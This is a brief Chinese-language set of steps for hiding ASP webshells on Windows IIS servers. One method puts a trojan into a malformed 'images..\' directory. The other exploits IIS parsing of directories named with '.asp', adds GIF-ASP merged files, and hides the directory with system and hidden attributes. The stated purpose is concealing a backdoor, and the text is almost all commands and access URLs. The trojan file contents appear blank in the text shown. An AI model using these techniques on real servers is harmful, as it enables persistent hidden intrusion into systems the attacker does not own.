1、建立非標准目錄:mkdir images..\
拷貝ASP木馬至目錄:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通過web訪問ASP木馬:http://ip/images../news.asp?action=login
如何刪除非標准目錄:rmdir images..\ /s
2、Windows中的IIS會對以.asp結尾的目錄中的文件進行解析,以達到我們隱藏自己的網頁後門的目的:
mkdir programme.asp
新建1.txt文件內容:
新建12.jpg文件內容: 或使用GIF與ASP合並後的文件
attrib +H +S programme.asp
通過web訪問ASP一句話木馬:http://ip/images/programme.asp/1.txt
